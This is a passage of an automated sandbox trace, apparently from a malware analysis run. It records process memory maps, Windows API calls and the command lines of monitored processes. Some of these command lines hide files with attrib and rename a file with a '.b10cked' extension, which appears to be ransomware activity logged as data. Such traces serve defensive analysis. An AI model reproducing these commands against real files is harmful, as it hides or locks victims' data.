"c:\\windows\\system32\\rpcrt4.dll") Region: id = 30432 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30433 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30434 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 30435 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30436 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30437 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30438 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 30439 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30440 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30441 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 30442 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30443 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 693 os_tid = 0x81c Process: id = "497" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16bc0" os_pid = "0xa08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "494" os_parent_pid = "0x4d4" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30444 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30445 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30446 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30447 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 30448 start_va = 0x130000 end_va = 0x136fff entry_point = 0x130000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 30449 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30450 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30451 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30452 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 30453 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30454 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30455 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30456 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30457 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 30458 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 30459 start_va = 0x6dc00000 end_va = 0x6dc1cfff entry_point = 0x6dc00000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 30460 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30461 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 30462 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30463 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30464 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 30465 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30466 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30467 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30468 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 30469 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30470 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30471 start_va = 0x140000 end_va = 0x207fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 30472 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30473 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 694 os_tid = 0xfb4 Process: id = "498" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16f20" os_pid = "0xd88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "494" os_parent_pid = "0x4d4" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30474 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30475 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30476 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30477 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 30478 start_va = 0xee0000 end_va = 0xee6fff entry_point = 0xee0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 30479 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30480 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30481 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30482 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 30483 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30484 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30485 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30486 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30487 start_va = 0x1b0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 30488 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 30489 start_va = 0x6dc20000 end_va = 0x6dc3cfff entry_point = 0x6dc20000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 30490 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30491 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 30492 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30493 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30494 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 30495 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30496 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30497 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30498 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 30499 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30500 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30501 start_va = 0x1c0000 end_va = 0x287fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 30502 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30503 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 695 os_tid = 0x720 Process: id = "499" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16720" os_pid = "0xf28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30516 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30517 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30518 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30519 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 30520 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30521 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30522 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30523 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30524 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 30525 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30546 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30547 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30548 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30549 start_va = 0x260000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 30550 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 30551 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30552 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30553 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30554 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30555 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30556 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30557 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30558 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30559 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30560 start_va = 0x420000 end_va = 0x4e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 30561 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30562 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30563 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 30564 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 30565 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 30566 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 30567 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 30568 start_va = 0x600000 end_va = 0x11fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 30569 start_va = 0x1200000 end_va = 0x1362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Thread: id = 696 os_tid = 0x670 [0207.236] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fc64 | out: lpSystemTimeAsFileTime=0x16fc64*(dwLowDateTime=0xb0547a20, dwHighDateTime=0x1d440a9)) [0207.237] GetCurrentProcessId () returned 0xf28 [0207.237] GetCurrentThreadId () returned 0x670 [0207.237] GetTickCount () returned 0x3a4d6 [0207.237] QueryPerformanceCounter (in: lpPerformanceCount=0x16fc5c | out: lpPerformanceCount=0x16fc5c*=26402581915) returned 1 [0207.237] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0207.237] __set_app_type (_Type=0x1) [0207.237] __p__fmode () returned 0x76b331f4 [0207.237] __p__commode () returned 0x76b331fc [0207.237] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0207.237] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0207.238] GetCurrentThreadId () returned 0x670 [0207.238] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x670) returned 0x38 [0207.238] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0207.238] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0207.238] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.238] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0207.238] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fbf4 | out: phkResult=0x16fbf4*=0x0) returned 0x2 [0207.238] VirtualQuery (in: lpAddress=0x16fc2b, lpBuffer=0x16fbc4, dwLength=0x1c | out: lpBuffer=0x16fbc4*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0207.238] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fbc4, dwLength=0x1c | out: lpBuffer=0x16fbc4*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0207.238] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fbc4, dwLength=0x1c | out: lpBuffer=0x16fbc4*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0207.238] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fbc4, dwLength=0x1c | out: lpBuffer=0x16fbc4*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0207.238] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fbc4, dwLength=0x1c | out: lpBuffer=0x16fbc4*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0207.238] GetConsoleOutputCP () returned 0x1b5 [0207.238] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0207.238] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0207.238] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.238] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0207.239] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.239] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0207.239] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.239] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0207.239] _get_osfhandle (_FileHandle=0) returned 0x3 [0207.239] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0207.239] _get_osfhandle (_FileHandle=0) returned 0x3 [0207.239] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0207.239] GetEnvironmentStringsW () returned 0x330190* [0207.239] FreeEnvironmentStringsW (penv=0x330190) returned 1 [0207.240] GetEnvironmentStringsW () returned 0x330190* [0207.240] FreeEnvironmentStringsW (penv=0x330190) returned 1 [0207.240] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eb64 | out: phkResult=0x16eb64*=0x40) returned 0x0 [0207.240] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eb6c, lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x0, lpData=0x16eb70*=0xb8, lpcbData=0x16eb68*=0x1000) returned 0x2 [0207.240] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eb6c, lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x4, lpData=0x16eb70*=0x1, lpcbData=0x16eb68*=0x4) returned 0x0 [0207.240] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eb6c, lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x0, lpData=0x16eb70*=0x1, lpcbData=0x16eb68*=0x1000) returned 0x2 [0207.240] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eb6c, lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x4, lpData=0x16eb70*=0x0, lpcbData=0x16eb68*=0x4) returned 0x0 [0207.240] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eb6c, lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x4, lpData=0x16eb70*=0x40, lpcbData=0x16eb68*=0x4) returned 0x0 [0207.240] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eb6c, lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x4, lpData=0x16eb70*=0x40, lpcbData=0x16eb68*=0x4) returned 0x0 